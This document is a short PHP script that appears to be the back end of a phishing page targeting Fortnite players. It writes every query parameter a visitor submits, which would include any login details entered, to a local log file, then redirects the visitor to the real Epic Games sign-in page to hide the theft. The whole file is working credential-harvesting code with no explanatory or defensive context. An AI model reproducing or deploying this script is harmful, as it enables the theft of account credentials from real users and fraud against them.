<?php
header ('Location: https://accounts.epicgames.com/login/customized?loginSubheading=Sign+In&regSubheading=Register&productName=fortnite&lang=en_US&redirectUrl=https%3A%2F%2Fwww.epicgames.com%2Ffortnite%2Fen-US%2Fhome&client_id=cd2b7c19c9734a2ab98dc251868d7724&noHostRedirect=true');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


